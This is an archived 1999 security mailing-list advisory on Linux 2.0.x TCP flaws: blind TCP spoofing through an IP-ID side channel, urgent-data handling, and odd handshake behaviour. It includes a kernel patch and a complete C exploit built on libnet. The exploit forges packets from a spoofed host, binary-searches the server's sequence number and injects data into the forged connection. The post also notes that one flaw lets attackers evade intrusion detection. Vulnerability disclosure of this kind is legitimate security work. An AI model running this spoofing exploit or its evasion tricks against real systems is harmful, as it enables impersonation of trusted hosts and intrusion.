linux_blind_tcp_spoof.txt

`Subject: Linux blind TCP spoofing, act II + others  
To: [email protected]   
  
  
Hello,  
Thanks to libnids development, some features/bugs in Linux kernel were found.  
I notified kernel mantainers in May, but they didn't seem interested.  
  
  
1. Blind TCP spoofing against 2.0.36/37  
Let's label a Linux server as A, an attacker's host as B, the spoofed  
host as C. If the following conditions hold:  
  
  
a) C is down (disabled)  
b) A is idle; more precisely, during the attack A should not send any  
packets beside ones generated in response to the packets sent by B  
c) during the attack, no packet sent from B to A can be dropped by a router  
  
  
then an attacker can spoof a TCP stream connecting A and C.  
As we see, these conditions are not trivial. However, b) and c) can  
hold if an attack is conducted during low network traffic period; and there  
are ways to fulfill a) :)  
Firstly, let's have a look how Linux 2.0.x reacts to a non-typical  
TCP segment sent as a third packet of a three way handshake. In the example  
below we send to a Linux server (A) packets from B with source address set to  
C.  
Time packets with forged source address packets sent by the server  
0 flags=S,seq=X  
1 flags=SA,seq=Y,ack_seq=X+1  
2 flags=A,seq=X+1, ack_seq=Y-1000  
3 no packet generated !  
4 flags=A,seq=X+1,ack_seq=Y+1000  
5 flags=R,seq=Y+1000  
a packet IS generated !  
6 flags=A,seq=X+1,ack_seq=Y+1  
7 flags=A,seq=Y+1,ack_seq=X+1  
socket enters "established" state  
8 flags=A,seq=X+1,ack_seq=Y+1000  
9 no packet sent !  
  
  
So, when an attacker sends (as a third packet of tcp handshake) a  
packet with too small ack_seq, the server sends no packets (doesn't it  
violate RFC793 ?). When a packet with too big ack_seq is sent, the server  
sends a packet (with a reset flag).  
Now let's recall another Linux feature. Many OSes (including Linux)  
assign to ID field of an outgoing IP datagram consecutive, increasing  
numbers (we forget about fragmentation here; irrelevant in this case). That  
enables anyone to determine the number of packets sent by host A: it's enough  
to ping it, note the value of ID field of received ICMP_REPLY packet, wait x  
seconds (or perform some other actions), then again ping host A. The  
difference between ID fields of received ICMP_REPLY packets is equal to (the  
number of packets sent by A in x second) +1. "Idle portscan" by antirez uses  
this technique.  
Having sent an initial TCP segment with SYN flag, our attack will  
consist of a set of "probes". In each probe, we send a (forged) TCP packet  
with flags=A and (arbitrary) ack_seq=X, then we send an ICMP_ECHO request, and  
finally note the ID field of received ICMP_REPLY packet. If this ID field has  
incremented by 1 since the last time, only one packet were sent by server  
(ICMP_REPLY), so we must have chosen too small X (that is, ack_seq). If ID  
field has incremented by 2, two packes were sent (TCP with reset flag and  
ICMP_REPLY), so we must have chosen too big ack_seq. This way we can perform  
a binary search in space of ack_seq's, determining exact ack_seq after at most  
32 probes. Note that finding correct ack_seq can be verified by sending a  
probe with previously found too big ack_seq; if connection is in "established"  
state, no packet will be generated by server.  
After we have found the Holy Graal of blind spoofers, the correct  
value of ack_seq, nothing will prevent us from completing 3whs and sending  
arbitrary data.  
At the end of this post I enclosed an exploit; don't use it without  
the permission of the target host's admin. I tested it on 2.0.37, 36 and 30;  
probably all 2.0.x are affected. It requires libnet (which can be downloaded  
from www.packetfactory.net). I compiled it on Linux glibc system. The  
following simple patch (against 2.0.37) enforces sending a reset in response  
to a packet with too small ack_seq (of course, only when we are in SYN_RECV  
state). This patch also cures the bug described in point 3.  
  
  
-------------------------CUT HERE--------------------------------------  
--- linux-2.0.37/net/ipv4/tcp_input.c.orig Fri Jul 23 17:25:14 1999  
+++ linux/net/ipv4/tcp_input.c Fri Jul 23 17:29:43 1999  
@@ -2764,7 +2764,18 @@  
kfree_skb(skb, FREE_READ);  
return 0;  
}  
-   
+  
+ if (sk->state==TCP_SYN_RECV && th->ack && skb->ack_seq!=sk->sent_seq)  
+ {  
+ /*  
+ * Quick fix to detect too small ack_seq  
+ * in 3rd packet of 3ws and force a RST segment.  
+ */  
+ tcp_send_reset(daddr, saddr, th,sk->prot, opt, dev,0,255);  
+ kfree_skb(skb, FREE_READ);  
+ return 0;  
+ }  
+   
rfc_step6:  
/*  
* If the accepted buffer put us over our queue size we  
-------------------------CUT HERE--------------------------------------  
  
2. A byte of urgent data can be received in normal data stream. Let's  
consider the following scenario:  
Time Client app Server app  
0 bind(...), listen(...), accept(...)  
1 connect(...)  
2 accept(...) returns newsock  
3 send(sockfd,"AB",2,MSG_OOB)  
4 send(sockfd,"XY",2,MSG_OOB)  
5 n=read(newsock,buffer,1024)  
  
  
function read returns 3, buffer contains "ABX", though byte 'B' was marked  
as urgent. Verified with 2.0.37 and 2.2.9-ac1, probably all versions are  
vulnerable. Note that this behaviour can be exploited to bypass NIDS.  
  
  
3. Weird handling of 3rd stage of TCP handshake.  
  
  
Time packets sent by a client packets sent by a server  
0 flags=S,seq=X  
1 flags=SA,seq=Y,ack_seq=X+1  
2 flags=A,seq=X+1,ack_seq=Y-4,data="xyz"  
3 flags=A,seq=Y+1,ack_seq=X+4  
no data is returned to app  
4 flags=SA,seq=Y+1,ack_seq=X+4  
5 flags=A,seq=X+1,ack_seq=Y+1,data="1234567"  
6 flags=A,seq=Y+1,ack_seq=X+8  
app receives "4567"  
which is inconsitent. Either the packet sent in time 2 should be discarded and  
app should receive "1234567", or app should receive "xyz4567" .  
Verified on 2.0.36, 2.2.x behaves correctly (sends reset in time 3).  
Usually it is not a problem, but IDS developers can be worried.  
  
  
Save yourself,  
Nergal  
  
  
/* by Nergal */  
  
  
#include "libnet.h"  
#include <netinet/ip.h>  
#include <netdb.h>  
int sock, icmp_sock;  
int packid;  
unsigned int target, target_port, spoofed, spoofed_port;  
unsigned long myaddr;  
int  
get_id ()  
{  
char buf[200];  
char buf2[200];  
int n;  
unsigned long addr;  
build_icmp_echo (ICMP_ECHO, 0, getpid (), 1, 0, 0, buf + IP_H);  
build_ip (ICMP_ECHO_H, 0, packid++, 0, 64, IPPROTO_ICMP, myaddr,  
target, 0, 0, buf);  
do_checksum (buf, IPPROTO_ICMP, ICMP_ECHO_H);  
write_ip (sock, buf, IP_H + ICMP_ECHO_H);  
do  
{  
n = read (icmp_sock, buf2, 200);  
addr = ((struct iphdr *) buf2)->saddr;  
}  
while (addr != target);  
return ntohs (((struct iphdr *) buf2)->id);  
}  
  
  
static int first_try;  
  
  
  
int  
is_bigger ()  
{  
static unsigned short id = 0, tmp;  
usleep (10000);  
tmp = get_id ();  
if (tmp == id + 1)  
{  
id = tmp;  
return 0;  
}  
else if (tmp == id + 2)  
{  
id = tmp;  
return 1;  
}  
else  
{  
if (first_try)  
{  
id = tmp;  
first_try = 0;  
return 0;  
}  
fprintf (stderr, "Unexpected IP id, diff=%i\n", tmp - id);  
exit (1);  
}  
}  
  
  
void  
probe (unsigned int ack)  
{  
char buf[200];  
usleep (10000);  
build_tcp (spoofed_port, target_port, 2, ack, 16, 32000, 0, 0, 0, buf + IP_H);  
build_ip (TCP_H, 0, packid++, 0, 64, IPPROTO_TCP, spoofed,  
target, 0, 0, buf);  
do_checksum (buf, IPPROTO_TCP, TCP_H);  
write_ip (sock, buf, IP_H + TCP_H);  
}  
  
  
void  
send_data (unsigned int ack, char *rant)  
{  
char * buf=alloca(200+strlen(rant));  
build_tcp (spoofed_port, target_port, 2, ack, 16, 32000, 0, rant, strlen (rant), buf + IP_H);  
build_ip (TCP_H + strlen (rant), 0, packid++, 0, 64, IPPROTO_TCP, spoofed,  
target, 0, 0, buf);  
do_checksum (buf, IPPROTO_TCP, TCP_H + strlen (rant));  
write_ip (sock, buf, IP_H + TCP_H + strlen (rant));  
}  
  
  
void  
send_syn ()  
{  
char buf[200];  
build_tcp (spoofed_port, target_port, 1, 0, 2, 32000, 0, 0, 0, buf + IP_H);  
build_ip (TCP_H, 0, packid++, 0, 64, IPPROTO_TCP, spoofed,  
target, 0, 0, buf);  
do_checksum (buf, IPPROTO_TCP, TCP_H);  
write_ip (sock, buf, IP_H + TCP_H);  
}  
  
  
#define MESSAGE "Check out netstat on this host :)\n"  
  
  
  
void  
send_reset ()  
{  
char buf[200];  
build_tcp (spoofed_port, target_port, 4 + strlen (MESSAGE), 0, 4, 32000, 0, 0, 0, buf + IP_H);  
build_ip (TCP_H, 0, packid++, 0, 64, IPPROTO_TCP, spoofed,  
target, 0, 0, buf);  
do_checksum (buf, IPPROTO_TCP, TCP_H);  
write_ip (sock, buf, IP_H + TCP_H);  
}  
  
  
  
#define LOTS ((unsigned int)(1<<30))  
main (int argc, char **argv)  
{  
unsigned int seq_low = 0, seq_high = 0, seq_toohigh, seq_curr;  
int i;  
char myhost[100];  
struct hostent *ht;  
if (argc != 5)  
{  
printf ("usage:%s target_ip target_port spoofed_ip spofed_port\n", argv[0]);  
exit (1);  
}  
gethostname (myhost, 100);  
ht = gethostbyname (myhost);  
if (!ht)  
{  
printf ("Your system is screwed.\n");  
exit (1);  
}  
myaddr = *(unsigned long *) (ht->h_addr);  
target = inet_addr (argv[1]);  
target_port = atoi (argv[2]);  
spoofed = inet_addr (argv[3]);  
spoofed_port = atoi (argv[4]);  
sock = open_raw_sock (IPPROTO_RAW);  
icmp_sock = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP);  
if (sock <= 0 || icmp_sock <= 0)  
{  
perror ("raw sockets");  
exit (1);  
}  
packid = getpid () * 256;  
fprintf(stderr,"Checking for IP id increments\n");  
first_try=1;  
for (i = 0; i < 5; i++)  
{  
is_bigger ();  
sleep(1);  
fprintf(stderr,"#");  
}  
send_syn ();  
fprintf (stderr, "\nSyn sent, waiting 33 sec to get rid of resent SYN+ACK...");  
for (i = 0; i < 33; i++)  
{  
fprintf (stderr, "#");  
sleep (1);  
}  
fprintf (stderr, "\nack_seq accuracy:");  
first_try=1;  
is_bigger();  
probe (LOTS);  
if (is_bigger ())  
seq_high = LOTS;  
else  
seq_low = LOTS;  
probe (2 * LOTS);  
if (is_bigger ())  
seq_high = 2 * LOTS;  
else  
seq_low = 2 * LOTS;  
probe (3 * LOTS);  
if (is_bigger ())  
seq_high = 3 * LOTS;  
else  
seq_low = 3 * LOTS;  
seq_toohigh = seq_high;  
if (seq_high == 0 || seq_low == 0)  
{  
fprintf (stderr, "Non-listening port or not 2.0.x machine\n");  
send_reset ();  
exit (0);  
}  
  
  
do  
{  
fprintf (stderr, "%i ", (unsigned int) (seq_high - seq_low));  
if (seq_high > seq_low)  
seq_curr = seq_high / 2 + seq_low / 2 + (seq_high % 2 + seq_low % 2) / 2;  
else  
seq_curr = seq_low + (unsigned int) (1 << 31) - (seq_low - seq_high) / 2;  
probe (seq_curr);  
if (is_bigger ())  
seq_high = seq_curr;  
else  
seq_low = seq_curr;  
probe (seq_toohigh);  
if (!is_bigger ())  
break;  
// getchar();  
}  
while ((unsigned int) (seq_high - seq_low) > 1);  
fprintf (stderr, "\nack_seq=%u, sending data...\n", seq_curr);  
send_data (seq_curr, MESSAGE);  
fprintf (stderr, "Press any key to send reset.\n");  
getchar ();  
send_reset ();  
  
  
}  
`